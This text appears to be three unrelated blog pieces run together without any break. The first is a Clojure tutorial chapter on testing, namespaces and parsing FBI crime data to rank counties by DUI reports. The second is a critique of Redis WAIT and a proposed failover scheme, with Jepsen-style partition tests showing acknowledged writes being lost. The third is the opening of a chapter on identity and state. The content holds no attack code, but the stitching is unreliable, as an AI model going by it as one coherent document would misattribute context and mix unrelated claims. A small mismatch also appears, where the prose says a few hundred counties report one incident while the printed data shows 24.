A failure is when a test returns the wrong value. An error is when a test throws an exception. In this case, the test named a-test, in the file core_test.clj, on line 7, failed. That test expected zero to be equal to one–but found that 0 and 1 were (in point of fact) not equal. Let’s take a look at that test, in test/scratch/core_test.clj.

(ns scratch.core-test
  (:require [clojure.test :refer :all]
            [scratch.core :refer :all]))

(deftest a-test
  (testing "FIXME, I fail."
    (is (= 0 1))))

These tests live in a namespace too! Notice that namespaces and file names match up: scratch.core lives in src/scratch/core.clj, and scratch.core-test lives in test/scratch/core_test.clj. Dashes (-) in namespaces correspond to underscores (_) in filenames, and dots (.) correspond to directory separators (/).
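
That convention is mechanical enough to write down. Here's a hypothetical helper–not something Leiningen actually provides–that maps a namespace name to its expected file path:

```clojure
(require '[clojure.string :as str])

(defn ns->path
  "Converts a namespace name to its .clj path fragment: dashes become
  underscores, and dots become directory separators."
  [ns-name]
  (str (-> ns-name
           (str/replace "-" "_")
           (str/replace "." "/"))
       ".clj"))

(ns->path "scratch.core-test")
;; => "scratch/core_test.clj"
```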

The scratch.core-test namespace is responsible for testing things in scratch.core. Notice that it requires two namespaces: clojure.test, which provides testing functions and macros, and scratch.core, which is the namespace we want to test.

Then we define a test using deftest. deftest takes a symbol as a test name, and then any number of expressions to evaluate. We can use testing to split up tests into smaller pieces. If a test fails, lein test will print out the enclosing deftest and testing names, to make it easier to figure out what went wrong.

Let’s change this test so that it passes. 0 should equal 0.

(deftest a-test
  (testing "Numbers are equal to themselves, right?"
    (is (= 0 0))))

aphyr@waterhouse:~/scratch$ lein test

lein test scratch.core-test

Ran 1 tests containing 1 assertions.
0 failures, 0 errors.

Wonderful! Now let’s test the pow function. I like to start with a really basic case and work my way up to more complicated ones. 1^1 is 1, so:

(deftest pow-test
  (testing "unity"
    (is (= 1 (pow 1 1)))))

aphyr@waterhouse:~/scratch$ lein test

lein test scratch.core-test

Ran 1 tests containing 1 assertions.
0 failures, 0 errors.

Excellent. How about something harder?

(deftest pow-test
  (testing "unity"
    (is (= 1 (pow 1 1))))

  (testing "square integers"
    (is (= 9 (pow 3 2)))))

aphyr@waterhouse:~/scratch$ lein test

lein test scratch.core-test

lein test :only scratch.core-test/pow-test

FAIL in (pow-test) (core_test.clj:10)
square integers
expected: (= 9 (pow 3 2))
  actual: (not (= 9 8))

Ran 1 tests containing 2 assertions.
1 failures, 0 errors.
Tests failed.

That’s odd. 3^2 should be 9, not 8. Let’s double-check our code in the REPL. base was 3, and power was 2, so…

user=> (repeat 3 2)
(2 2 2)
user=> (* 2 2 2)
8

Ah, there’s the problem. We’re mis-using repeat. Instead of repeating 3 twice, we repeated 2 thrice.

user=> (doc repeat)
-------------------------
clojure.core/repeat
([x] [n x])
  Returns a lazy (infinite!, or length n if supplied) sequence of xs.

Let’s redefine pow with the correct arguments to repeat:

(defn pow
  "Raises base to the given power. For instance, (pow 3 2) returns three
  squared, or nine."
  [base power]
  (apply * (repeat power base)))

How about 0^0? By convention, mathematicians define 0^0 as 1.

(deftest pow-test
  (testing "unity"
    (is (= 1 (pow 1 1))))

  (testing "square integers"
    (is (= 9 (pow 3 2))))

  (testing "0^0"
    (is (= 1 (pow 0 0)))))

aphyr@waterhouse:~/scratch$ lein test

lein test scratch.core-test

Ran 1 tests containing 3 assertions.
0 failures, 0 errors.

Hey, what do you know? It works! But why?

user=> (repeat 0 0)
()

What happens when we call * with an empty list of arguments?

user=> (*)
1

Remember when we talked about how the zero-argument forms of + and * made some definitions simpler? This is one of those times. We didn’t have to define a special exception for zero powers, because (*) returns the multiplicative identity 1, by convention.
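
Those identity values are easy to check directly:

```clojure
;; The zero-argument call of each arithmetic operator returns that
;; operator's identity element:
(+)  ;; => 0
(*)  ;; => 1

;; ...which is why multiplying an empty sequence of bases gives 1,
;; handling the zero-power case with no special code:
(apply * (repeat 0 0))  ;; => 1
```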

Exploring data

The last bit of logistics we need to talk about is working with other people’s code. Clojure projects, like most modern programming environments, are built to work together. We can use libraries to parse data, solve mathematical problems, render graphics, perform simulations, talk to robots, or predict the weather. As a quick example, I’d like to imagine that you and I are public-health researchers trying to identify the best location for an ad campaign to reduce drunk driving.

The FBI’s Uniform Crime Reporting database tracks the annual tally of different types of arrests, broken down by county–but the data files provided by the FBI are a mess to work with. Helpfully, Matt Aliabadi has organized the UCR’s somewhat complex format into nice, normalized files in a data format called JSON, and made them available on Github. Let’s download the most recent year’s normalized data, and save it in the scratch directory.

What’s in this file, anyway? Let’s take a look at the first few lines using head:

aphyr@waterhouse:~/scratch$ head 2008.json
[
  {
    "icpsr_study_number": null,
    "icpsr_edition_number": 1,
    "icpsr_part_number": 1,
    "icpsr_sequential_case_id_number": 1,
    "fips_state_code": "01",
    "fips_county_code": "001",
    "county_population": 52417,
    "number_of_agencies_in_county": 3,

This is a data format called JSON, and it looks a lot like Clojure’s data structures. That’s the start of a vector on the first line, and the second line starts a map. Then we’ve got string keys like "icpsr_study_number", and values which look like null (nil), numbers, or strings. But in order to work with this file, we’ll need to parse it into Clojure data structures. For that, we can use a JSON parsing library, like Cheshire.

Cheshire, like most Clojure libraries, is published on an internet repository called Clojars. To include it in our scratch project, all we have to do is open project.clj in a text editor and add a line specifying that we want to use a particular version of Cheshire.

(defproject scratch "0.1.0-SNAPSHOT"
  :description "Just playing around"
  :url "http://example.com/FIXME"
  :license {:name "Eclipse Public License"
            :url "http://www.eclipse.org/legal/epl-v10.html"}
  :dependencies [[org.clojure/clojure "1.5.1"]
                 [cheshire "5.3.1"]])

Now we’ll exit the REPL with Control+D (^D), and restart it with lein repl. Leiningen, the Clojure package manager, will automatically download Cheshire from Clojars and make it available in the new REPL session.

Now let’s figure out how to parse the JSON file. Looking at Cheshire’s README shows an example that looks helpful:

;; parse some json and get keywords back
(parse-string "{\"foo\":\"bar\"}" true)
;; => {:foo "bar"}

So Cheshire includes a parse-string function which can take a string and return a data structure. How can we get a string out of a file? Using slurp:

user=> (use 'cheshire.core)
nil
user=> (parse-string (slurp "2008.json"))
...

Woooow, that’s a lot of data! Let’s chop it down to something more manageable. How about the first entry?

user=> (first (parse-string (slurp "2008.json")))
{"syntheticdrug_salemanufacture" 1,
 "all_other_offenses_except_traffic" 900,
 "arson" 3,
 ...}
user=> (-> "2008.json" slurp parse-string first)

It’d be nicer if this data used keywords instead of strings for its keys. Let’s use the second argument to Cheshire’s parse-string to convert all the keys in maps to keywords.

user=> (first (parse-string (slurp "2008.json") true))
{:other_assaults 288,
 :gambling_all_other 0,
 :arson 3,
 ...
 :drunkenness 108}

Since we’re going to be working with this dataset over and over again, let’s bind it to a variable for easy re-use.

user=> (def data (parse-string (slurp "2008.json") true))
#'user/data

Now we’ve got a big long vector of counties, each represented by a map–but we’re just interested in the DUIs of each one. What does that look like? Let’s map each county to its :driving_under_influence.

user=> (->> data (map :driving_under_influence))
(198 1095 114 98 135 4 122 587 204 53 177 ...

What’s the most any county has ever reported?

user=> (->> data (map :driving_under_influence) (apply max))
45056

45056 counts in one year? Wow! What about the second-worst county? The easiest way to find the top n counties is to sort the list, then look at the final elements.

user=> (->> data (map :driving_under_influence) sort (take-last 10))
(8589 10432 10443 10814 11439 13983 17572 18562 26235 45056)

So the top 10 counties range from 8589 counts to 45056 counts. What’s the most common count? Clojure comes with a built-in function called frequencies which takes a sequence of elements, and returns a map from each element to how many times it appeared in the sequence.
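
On a small sequence, the shape of its result looks like this:

```clojure
;; frequencies turns a sequence into a map from element to occurrence count.
(frequencies [:a :b :a :c :a])
;; => {:a 3, :b 1, :c 1}
```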

user=> (->> data (map :driving_under_influence) frequencies)
{0 227, 1024 1, 45056 1, 32 15, 2080 1, 64 12 ...

Now let’s take those [drunk-driving, frequency] pairs and sort them by key to produce a histogram. sort-by takes a function to apply to each element in the collection–in this case, a key-value pair–and returns something that can be sorted, like a number. We’ll choose the key function to extract the key from each key-value pair, effectively sorting the counties by number of reported incidents.

user=> (->> data
            (map :driving_under_influence)
            frequencies
            (sort-by key)
            pprint)
([0 227]
 [1 24]
 [2 17]
 [3 20]
 [4 17]
 [5 24]
 [6 23]
 [7 23]
 [8 17]
 [9 19]
 [10 29]
 [11 20]
 [12 18]
 [13 21]
 [14 25]
 [15 13]
 [16 18]
 [17 16]
 [18 17]
 [19 11]
 [20 8]
 ...

So a ton of counties (227 out of 3172 total) report no drunk driving; a few hundred have one incident, a moderate number have 10-20, and it falls off from there. This is a common sort of shape in statistics; often a hallmark of an exponential distribution.

How about the 10 worst counties, all the way out on the end of the curve?

user=> (->> data
            (map :driving_under_influence)
            frequencies
            (sort-by key)
            (take-last 10)
            pprint)
([8589 1]
 [10432 1]
 [10443 1]
 [10814 1]
 [11439 1]
 [13983 1]
 [17572 1]
 [18562 1]
 [26235 1]
 [45056 1])

So it looks like 45056 is high, but there are 8 other counties with tens of thousands of reports too. Let’s back up to the original dataset, and sort it by DUIs:

user=> (->> data
            (sort-by :driving_under_influence)
            (take-last 10)
            pprint)
({:other_assaults 3096,
  :gambling_all_other 3,
  :arson 106,
  :have_stolen_property 698,
  :syntheticdrug_salemanufacture 0,
  :icpsr_sequential_case_id_number 220,
  :drug_abuse_salemanufacture 1761,
  ...

What we’re looking for is the county names, but it’s a little hard to read these enormous maps. Let’s take a look at just the keys that define each county, and see which ones might be useful. We’ll take this list of counties, map each one to a list of its keys, and concatenate those lists together into one big long list. mapcat maps and concatenates in a single step. We expect the same keys to show up over and over again, so we’ll remove duplicates by merging all those keys into a sorted-set.
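
On toy data, those two steps look like this:

```clojure
;; Map each map to its keys, concatenated into one flat sequence...
(mapcat keys [{:a 1} {:a 2, :b 3}])
;; => (:a :a :b)

;; ...then pour the duplicates into a sorted set, keeping each key once.
(into (sorted-set) (mapcat keys [{:a 1} {:a 2, :b 3}]))
;; => #{:a :b}
```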

user=> (->> data
            (sort-by :driving_under_influence)
            (take-last 10)
            (mapcat keys)
            (into (sorted-set))
            pprint)
#{:aggravated_assaults :all_other_offenses_except_traffic :arson
  :auto_thefts :bookmaking_horsesport :burglary :county_population
  :coverage_indicator :curfew_loitering_laws :disorderly_conduct
  :driving_under_influence :drug_abuse_salemanufacture
  :drug_abuse_violationstotal :drug_possession_other
  :drug_possession_subtotal :drunkenness :embezzlement :fips_county_code
  :fips_state_code :forgerycounterfeiting :fraud :gambling_all_other
  :gambling_total :grand_total :have_stolen_property :icpsr_edition_number
  :icpsr_part_number :icpsr_sequential_case_id_number :icpsr_study_number
  :larceny :liquor_law_violations :marijuana_possession
  :marijuanasalemanufacture :multicounty_jurisdiction_flag :murder
  :number_of_agencies_in_county :numbers_lottery
  :offenses_against_family_child :opiumcocaine_possession
  :opiumcocainesalemanufacture :other_assaults :otherdang_nonnarcotics
  :part_1_total :property_crimes :prostitutioncomm_vice :rape :robbery
  :runaways :sex_offenses :suspicion :synthetic_narcoticspossession
  :syntheticdrug_salemanufacture :vagrancy :vandalism :violent_crimes
  :weapons_violations}

Ah, :fips_county_code and :fips_state_code look promising. Let’s compact the dataset to just drunk driving and those codes, using select-keys.

user=> (->> data
            (sort-by :driving_under_influence)
            (take-last 10)
            (map #(select-keys % [:driving_under_influence
                                  :fips_county_code
                                  :fips_state_code]))
            pprint)
({:fips_state_code "06", :fips_county_code "067", :driving_under_influence 8589}
 {:fips_state_code "48", :fips_county_code "201", :driving_under_influence 10432}
 {:fips_state_code "32", :fips_county_code "003", :driving_under_influence 10443}
 {:fips_state_code "06", :fips_county_code "065", :driving_under_influence 10814}
 {:fips_state_code "53", :fips_county_code "033", :driving_under_influence 11439}
 {:fips_state_code "06", :fips_county_code "071", :driving_under_influence 13983}
 {:fips_state_code "06", :fips_county_code "059", :driving_under_influence 17572}
 {:fips_state_code "06", :fips_county_code "073", :driving_under_influence 18562}
 {:fips_state_code "04", :fips_county_code "013", :driving_under_influence 26235}
 {:fips_state_code "06", :fips_county_code "037", :driving_under_influence 45056})

Now we’re getting somewhere–but we need a way to interpret these state and county codes. Googling for “FIPS” led me to Wikipedia’s account of the FIPS county code system, and the NOAA’s ERDDAP service, which has a table mapping FIPS codes to state and county names. Let’s save that file as fips.json.

Now we’ll slurp that file into the REPL and parse it, just like we did with the crime dataset.

user=> (def fips (parse-string (slurp "fips.json") true))

Let’s take a quick look at the structure of this data:

user=> (keys fips)
(:table)
user=> (keys (:table fips))
(:columnNames :columnTypes :rows)
user=> (->> fips :table :columnNames)
["FIPS" "Name"]

Great, so we expect the rows to be a list of FIPS code and Name.

user=> (->> fips :table :rows (take 3) pprint)
(["02000" "AK"]
 ["02013" "AK, Aleutians East"]
 ["02016" "AK, Aleutians West"])

Perfect. Now that we’ve done some exploratory work in the REPL, let’s shift back to an editor. Create a new file in src/scratch/crime.clj:

(ns scratch.crime
  (:require [cheshire.core :as json]))

(def fips
  "A map of FIPS codes to their county names."
  (->> (json/parse-string (slurp "fips.json") true)
       :table
       :rows
       (into {})))

We’re just taking a snippet we wrote in the REPL–parsing the FIPS dataset–and writing it down for use as a part of a bigger program. We use (into {}) to convert the sequence of [fips, name] pairs into a map, just like we used into (sorted-set) to merge a list of keywords into a set earlier. into works just like conj, repeated over and over again, and is an incredibly useful tool for building up collections of things.
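
That equivalence is easy to see on small data:

```clojure
;; into is just conj, repeated over a collection: these are equivalent.
(reduce conj {} [[:a 1] [:b 2]])  ;; => {:a 1, :b 2}
(into {} [[:a 1] [:b 2]])         ;; => {:a 1, :b 2}

;; The same trick builds the FIPS lookup map from [code name] rows:
(into {} [["02000" "AK"] ["02013" "AK, Aleutians East"]])
;; => {"02000" "AK", "02013" "AK, Aleutians East"}
```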

Back in the REPL, let’s check if that worked:

user=> (use 'scratch.crime :reload)
nil
user=> (fips "10001")
"DE, Kent"

Remember, maps act like functions in Clojure, so we can use the fips map to look up the names of counties efficiently.

We also have to load the UCR crime file–so let’s split that load-and-parse code into its own function:

(defn load-json
  "Given a filename, reads a JSON file and returns it, parsed, with keywords."
  [file]
  (json/parse-string (slurp file) true))

(def fips
  "A map of FIPS codes to their county names."
  (->> "fips.json"
       load-json
       :table
       :rows
       (into {})))

Now we can re-use load-json to load the UCR crime file.

(defn most-duis
  "Given a JSON filename of UCR crime data for a particular year, finds the
  counties with the most DUIs."
  [file]
  (->> file
       load-json
       (sort-by :driving_under_influence)
       (take-last 10)
       (map #(select-keys % [:driving_under_influence
                             :fips_county_code
                             :fips_state_code]))))

user=> (use 'scratch.crime :reload)
nil
user=> (pprint (most-duis "2008.json"))
({:fips_state_code "06", :fips_county_code "067", :driving_under_influence 8589}
 {:fips_state_code "48", :fips_county_code "201", :driving_under_influence 10432}
 {:fips_state_code "32", :fips_county_code "003", :driving_under_influence 10443}
 {:fips_state_code "06", :fips_county_code "065", :driving_under_influence 10814}
 {:fips_state_code "53", :fips_county_code "033", :driving_under_influence 11439}
 {:fips_state_code "06", :fips_county_code "071", :driving_under_influence 13983}
 {:fips_state_code "06", :fips_county_code "059", :driving_under_influence 17572}
 {:fips_state_code "06", :fips_county_code "073", :driving_under_influence 18562}
 {:fips_state_code "04", :fips_county_code "013", :driving_under_influence 26235}
 {:fips_state_code "06", :fips_county_code "037", :driving_under_influence 45056})

Almost there. We need to join together the state and county FIPS codes into a single string, because that’s how fips represents the county code:

(defn fips-code
  "Given a county (a map with :fips_state_code and :fips_county_code keys),
  returns the five-digit FIPS code for the county, as a string."
  [county]
  (str (:fips_state_code county) (:fips_county_code county)))

Let’s write a quick test in test/scratch/crime_test.clj to verify that function works correctly:

(ns scratch.crime-test
  (:require [clojure.test :refer :all]
            [scratch.crime :refer :all]))

(deftest fips-code-test
  (is (= "12345" (fips-code {:fips_state_code "12"
                             :fips_county_code "345"}))))

aphyr@waterhouse:~/scratch$ lein test scratch.crime-test

lein test scratch.crime-test

Ran 1 tests containing 1 assertions.
0 failures, 0 errors.

Great. Note that lein test some-namespace runs only the tests in that particular namespace. For the last step, let’s take the most-duis function and, using fips and fips-code, construct a map of county names to DUI reports.

(defn most-duis
  "Given a JSON filename of UCR crime data for a particular year, finds the
  counties with the most DUIs."
  [file]
  (->> file
       load-json
       (sort-by :driving_under_influence)
       (take-last 10)
       (map (fn [county]
              [(fips (fips-code county))
               (:driving_under_influence county)]))
       (into {})))

user=> (use 'scratch.crime :reload) (pprint (most-duis "2008.json"))
nil
{"CA, Orange" 17572,
 "CA, San Bernardino" 13983,
 "CA, Los Angeles" 45056,
 "CA, Riverside" 10814,
 "NV, Clark" 10443,
 "WA, King" 11439,
 "AZ, Maricopa" 26235,
 "CA, San Diego" 18562,
 "TX, Harris" 10432,
 "CA, Sacramento" 8589}

Our question is, at least in part, answered: Los Angeles and Maricopa counties, in California and Arizona, have the most reports of drunk driving out of any counties in the 2008 Uniform Crime Reporting database. These might be good counties for a PSA campaign. California has either lots of drunk drivers, or aggressive enforcement, or both! Remember, this only tells us about reports of crimes, not the crimes themselves. Numbers vary based on how each state enforces its laws!

(ns scratch.crime
  (:require [cheshire.core :as json]))

(defn load-json
  "Given a filename, reads a JSON file and returns it, parsed, with keywords."
  [file]
  (json/parse-string (slurp file) true))

(def fips
  "A map of FIPS codes to their county names."
  (->> "fips.json"
       load-json
       :table
       :rows
       (into {})))

(defn fips-code
  "Given a county (a map with :fips_state_code and :fips_county_code keys),
  returns the five-digit FIPS code for the county, as a string."
  [county]
  (str (:fips_state_code county) (:fips_county_code county)))

(defn most-duis
  "Given a JSON filename of UCR crime data for a particular year, finds the
  counties with the most DUIs."
  [file]
  (->> file
       load-json
       (sort-by :driving_under_influence)
       (take-last 10)
       (map (fn [county]
              [(fips (fips-code county))
               (:driving_under_influence county)]))
       (into {})))

Recap

In this chapter, we expanded beyond transient programs written in the REPL. We learned how projects combine static resources, code, and tests into a single package, and how projects can relate to one another through dependencies. We learned the basics of Clojure’s namespace system, which isolates distinct chunks of code from one another, and how to include definitions from one namespace in another via require and use. We learned how to write and run tests to verify our code’s correctness, and how to move seamlessly between the REPL and code in .clj files. We made use of Cheshire, a Clojure library published on Clojars, to parse JSON–a common data format. Finally, we brought together our knowledge of Clojure’s basic grammar, immutable data structures, core functions, sequences, threading macros, and vars to explore a real-world problem.

Exercises

  1. most-duis tells us about the raw number of reports, but doesn’t account for differences in county population. One would naturally expect counties with more people to have more crime! Divide the :driving_under_influence of each county by its :county_population to find a prevalence of DUIs, and take the top ten counties based on prevalence. How should you handle counties with a population of zero?

  2. How do the counties with the highest prevalence compare to the original top ten? Expand most-duis to return vectors of [county-name, prevalence, report-count, population]. What are the populations of the high-prevalence counties? Why do you suppose the data looks this way? If you were leading a public-health campaign to reduce drunk driving, would you target your intervention based on report count or prevalence? Why?

  3. We can generalize the most-duis function to handle any type of crime. Write a function most-prevalent which takes a file and a field name, like :arson, and finds the counties where that field is most often reported, per capita.

  4. Write a test to verify that most-prevalent is correct.

In a recent blog post, antirez detailed a new operation in Redis: WAIT. WAIT is proposed as an enhancement to Redis' replication protocol to reduce the window of data loss in replicated Redis systems; clients can block awaiting acknowledgement of a write to a given number of nodes (or time out if the given threshold is not met). The theory here is that positive acknowledgement of a write to a majority of nodes guarantees that write will be visible in all future states of the system.

As I explained earlier, any asynchronously replicated system with primary-secondary failover allows data loss. Optional synchronous replication, antirez proposes, should make it possible for Redis to provide strong consistency for those operations.

WAIT means that if you run three nodes A, B, C where every node contains a Sentinel instance and a Redis instance, and you “WAIT 1” after every operation to reach the majority of slaves, you get a consistent system.

WAIT can be also used, by improving the failover procedure, in order to have a strong consistent system (no writes to the older master from the point the failure detection is positive, to the end of the failover when the configuration is updated, or alternative, disconnect the majority of slaves you can reach during the failure detection so that every write will fail during this time).

Antirez later qualified these claims:

I understand this not the “C” consistency of “CAP” but, before: the partition with clients and the (old) master partitioned away would receive writes that gets lost. after: under certain system models the system is consistent, like if you assume that crashed instances never start again.

Of course, the existence of synchronous replication does not prove that the system is linearizable; only some types of failover preserve the ordering of writes.

As I showed in Call me maybe: Redis, Redis Sentinel will enter split-brain during network partitions, causing significant windows of data loss. Exactly how much data loss depends on the sentinel configuration and the failure topology. Antirez finally suggested that if we replace Redis Sentinel with a strongly consistent coordination service for failover, Redis WAIT could provide full linearizability.

The failover proposal

In a five-node cluster, assume every write is followed by WAIT 2 to ensure that a majority of nodes have received the write. In the event of a failure, a strong external coordinator goes through the following election process:

  1. Totally partition the old primary P1.
  2. Of all reachable nodes, identify the node with the highest replication offset. Let that node be P2.
  3. Promote P2.
  4. Inform all reachable nodes that they are to follow P2.
  5. Have all reachable clients switch to the new primary.

There are several serious problems with this design. I hinted at these issues in the mailing list with limited success. Kelly Sommers pointed out repeatedly that this design has the same issues as Cassandra’s CL.ALL. Replication alone does not ensure linearizability; we have to be able to roll back operations which should not have happened in the first place. If those failed operations can make it into our consistent timeline in an unsafe way, perhaps corrupting our successful operations, we can lose data.

… surprisingly I think that transactional rollbacks are totally irrelevant.

Ultimately I was hoping that antirez and other contributors might realize why their proposal for a custom replication protocol was unsafe nine months ago, and abandon it in favor of an established algorithm with a formal model and a peer-reviewed proof, but that hasn’t happened yet. Redis continues to accrete homegrown consensus and replication algorithms without even a cursory nod to formal analysis.

OK, fine. Let’s talk about the failover coordinator.

The coordinator

Redis Sentinel is not linearizable; nor are its proposed improvements. Whatever failover system you’re planning to use here is going to need something stronger. In fact, we can’t even guarantee safety using a strong coordination service like ZooKeeper to serialize the failover operations, because ZooKeeper cannot guarantee the mutual exclusion of two services in the presence of message delays and clock skews. Let’s paper over that issue by introducing large delays and carefully ordering our timeouts.

It gets worse. Even if we did have a perfect mutex around the coordinator, two coordinators could issue messages to the same Redis nodes which arrive out of order. TCP does not guarantee ordering between two distinct TCP streams, which means we might see coordinator A initiate a failover process then time out halfway; followed by coordinator B which begins the failover process, only to be interrupted on some nodes by messages en-route through the network from coordinator A. Don’t believe me? TCP message delays have been reported in excess of ninety seconds. That one took out Github.

It gets even worse. If the original primary P1 is isolated from the coordinator, the coordinator will not be able to force P1 to step down. Indeed, P1 could remain a primary for the entire duration of a failover, accepting writes, making state changes, and attempting to replicate those changes to other nodes. This is dangerous because we cannot atomically guarantee that the new majority of nodes will reject those writes.

  1. A client writes to P1, which replicates to secondaries S2, S3, S4, and S5.
  2. The coordinator attempts to elect a new primary, and sees S2, S3, S4, and S5.
  3. Without loss of generality, assume S2 has the highest replication offset. The coordinator promotes S2 to P2.
  4. P1 receives acks from S3, S4, and S5, and, having reached a majority, returns success to the client.
  5. The coordinator reparents S3, S4, and S5 to P2, destroying the write.

You might try to solve this by forcing S2–S5 into a read-only, non-replicating mode before attempting to promote a new primary, but that gets into a whole other morass of issues around multiple state transitions and partial failures. Suffice it to say: it’s difficult to solve this by simply pausing nodes first. Maybe impossible? I’m not sure.

Typically, replication protocols solve this problem by guaranteeing that writes from P1 can not be accepted after S2–S5 acknowledge to the coordinator that they will participate in a new cohort. This often takes the form of a ballot (Paxos), epoch (ZAB, Viewstamped Replication), or term (Raft). Redis has no such construct, and antirez seems to eschew it as unnecessary:

In this model, it is possible to reach linearizability? I believe, yes, because we removed all the hard part, for which the strong protocols like Raft use epochs.
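Epochs matter because they give replicas a fencing rule. As a hypothetical sketch (invented names, not Redis code), here is the guard a ballot, epoch, or term provides: once a replica acknowledges a new cohort, writes stamped with any older epoch are refused, so a deposed primary cannot sneak acknowledged writes into the new timeline.

```clojure
;; Sketch of epoch-based fencing. Each replica remembers the highest
;; election epoch it has joined.
(def acked-epoch (atom 0))

(defn join-cohort!
  "Acknowledge a new cohort. After this returns, writes stamped with
  any older epoch will be refused."
  [new-epoch]
  (swap! acked-epoch max new-epoch))

(defn accept-write?
  "A replica accepts a write only if it carries the current (or a
  newer) epoch."
  [write-epoch]
  (>= write-epoch @acked-epoch))
```

With this guard, the scenario above fails safely: once S3, S4, and S5 join P2’s cohort, any replication traffic still arriving from P1 carries a stale epoch and is rejected.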

This brings us to a different, but related series of problems.

The servers

By using the offset in the replication log as the determining factor in which nodes are promotable, the proposed failover design opens the door for significant data loss.

Imagine the following sequence:

  1. The primary P1, with log offset O1, becomes isolated from S3, S4, and S5.
  2. Clients writing to P1 see their operations using WAIT 2 fail.
  3. S3 is promoted to P3, with offset O1=O3. Clients writing to P3 see their writes succeed, replicated to S4 and S5.
  4. More operations occur on P1 than on P3. O1 becomes greater than O3.
  5. The partition heals; the coordinator can see both P1 and P3.
  6. The coordinator sees that O1 is higher than O3, and chooses P1 as the new primary.
  7. P3 is demoted, and all its acknowledged writes are destroyed.

Don’t believe me? Here, let’s try it. Here’s a function which implements (more or less) the proposed coordinator algorithm. Note that we’re not demoting the original primary because it may not be reachable.

(defn elect!
  "Forces an election among the given nodes. Picks the node with the
  highest replication offset, promotes it, and re-parents the secondaries."
  [nodes]
  (let [highest (highest-node nodes)]
    (log "Promoting" highest)
    (with-node highest
      (redis/slaveof "no" "one"))
    (doseq [node (remove #{highest} nodes)]
      (log "Reparenting" node "to" highest)
      (with-node node
        (redis/slaveof highest 6379)))))

And in the test, we’ll use WAIT to ensure that only writes which are successfully replicated to 2 or more replicas are considered successful:

(add [app element]
  (try
    (redis/with-conn pool spec
      (redis/sadd key element))
    ; Block for 2 secondaries (3 total) to ack.
    (let [acks (redis/with-conn pool spec
                 (taoensso.carmine.protocol/send-request! "WAIT" 2 1000))]
      (if (< acks 2)
        (do (log "not enough copies: " acks)
            error)
        ok))
    (catch Exception e
      (if (->> e .getMessage (re-find #"^READONLY"))
        error
        (throw e)))))

I’m gonna punt on informing clients which node is the current primary; we’ll just issue set-add requests to each node independently. Jepsen only cares about whether successful writes are lost, so we’ll let those writes fail and log ‘em as unsuccessful.

Initially, the offset for all 5 nodes is 15. Writes complete successfully on P1 and fail on S2–S5.

healthy.png

We cut off P1 and S2 from S3, S4, and S5. S3, S4, and S5 all have equal offsets (1570), so we promote S3 to P3. As soon as the partition takes effect, writes to P1 begin to fail–we see not enough copies: 1, and an :error status for write 110, 115, and so on. Latencies on P1 jump to 1 second, since that’s how long we’re blocking for using WAIT.

failover1.png

Writes complete successfully on P3, since it can see a majority of nodes: itself, S4, and S5. We heal the partition and initiate a second election. Since P1’s offset (8010) is higher than P3’s (6487), we preserve P1 as a primary and demote all other nodes to follow it. All P3’s writes accepted during the partition are silently destroyed.

failover2.png

Note that there’s actually a window here where writes can successfully take place on either P1 or P3 in a mixed sequence, depending on the order in which the secondaries are reparented. Both 560 and 562 complete successfully, even though 562 was written to S3, which was demoted at that point in time. Some weird opportunity for timing anomalies there.

results.png

These results are catastrophic. In a partition which lasted for roughly 45% of the test, 45% of acknowledged writes were thrown away. To add insult to injury, Redis preserved all the failed writes in place of the successful ones.

Additional issues

Two bugs amplify this problem. Note that this is the unstable branch, so this isn’t a huge deal right now:

First, Redis secondaries return -1 for their offset when they detect the primary is down. Returning a special status code makes sense… but not if you’re using the offset to determine which nodes become the primary. This could cause the highest nodes to appear the lowest, and vice versa. If a fresh node has offset 0, and all other nodes return offset -1, this could cause a cluster to erase all data ever written to it.
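To see why this is so dangerous, consider a naive max-offset election (a hypothetical sketch, not Redis code) run against a cluster where the secondaries that actually hold data report -1, and a freshly started, empty node reports 0:

```clojure
;; Sketch: a naive election that promotes the node with the highest
;; reported replication offset. Loaded secondaries report -1 because
;; they detected the primary was down; a fresh, empty node reports 0.
(defn naive-elect [nodes]
  (apply max-key :offset nodes))

user=> (naive-elect [{:node "S2"    :offset -1}
                     {:node "S3"    :offset -1}
                     {:node "fresh" :offset 0}])
{:node "fresh", :offset 0}
```

The empty node wins the election, and reparenting the others to it erases every write the cluster ever accepted.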

Second, Redis resets the replication offset to zero every time a node is promoted. Again, a reasonable choice in isolation, but it actually maximizes the chances that this particular failure mode will occur. The current design is biased towards data loss.

Even if these bugs were corrected, the problem could still occur. All that’s required is for more operations to happen on P1 than P3 after the two diverge.

Going forward

Distributed systems design is really hard, but engineers continue to assume otherwise:

However I think that distributed systems are not super hard, like kernel programming is not super hard, like C system programming is not super hard. Everything new or that you don’t do in a daily basis seems super hard, but it is actually different concepts that are definitely things everybody here in this list can master.

For sure a few months of exposure will not make you able to provide work like Raft or Paxos, but the basics can be used in order to try to design practical systems, that can be improved over time.

I assert just the opposite: we need formal theory, written proofs, computer verification, and experimental demonstration that our systems make the tradeoffs we think they make. Throughout the Redis criticism thread and discussion on Twitter, I see engineers assuming that they understand the tradeoffs despite the presence of gaping holes in the system’s safety net.

This behavior endangers users.

These list threads and blog posts are the sources that users come to, years later, to understand the safety properties of our systems. They’ll read our conjectures and idle thoughts and tease out some gestalt, and use that to build their systems on top of ours. They’ll miss subtle differences in phrasing and they won’t read every reply. Most won’t do any reading at all; they’re not even aware that these problems could exist.

Engineers routinely characterize Redis’s reliability as “rock solid”.

This is part of why I engage in these discussions so vocally. As systems engineers, we continually struggle to erase the assumption of safety before that assumption causes data loss or downtime. We need to clearly document system behaviors so that users can make the right choices.

We must understand our systems in order to explain them–and distributed systems are hard to understand. That’s why it’s so important that we rely on formal models, on proofs, instead of inventing our own consensus protocols–because much of the hard work of understanding has been done already. We can build on that work. Implementing a peer-reviewed paper is vastly simpler than trying to design and verify an algorithm from scratch–or worse, evolving one piecemeal, comprised of systems which encode subtly different assumptions about their responsibilities to the world. Those designs lead to small gaps which, viewed from the right angle, become big enough to drive a truck through.

I wholeheartedly encourage antirez, myself, and every other distributed systems engineer: keep writing code, building features, solving problems–but please, please, use existing algorithms, or learn how to write a proof.

Previously: Macros.

Most programs encompass change. People grow up, leave town, fall in love, and take new names. Engines burn through fuel while their parts wear out, and new ones are swapped in. Forests burn down and their logs become nurseries for new trees. Despite these changes, we say “She’s still Nguyen”, “That’s my motorcycle”, “The same woods I hiked through as a child.”

Identity is a skein we lay across the world of immutable facts; a single entity which encompasses change. In programming, identities unify different values over time. Identity types are mutable references to immutable values.

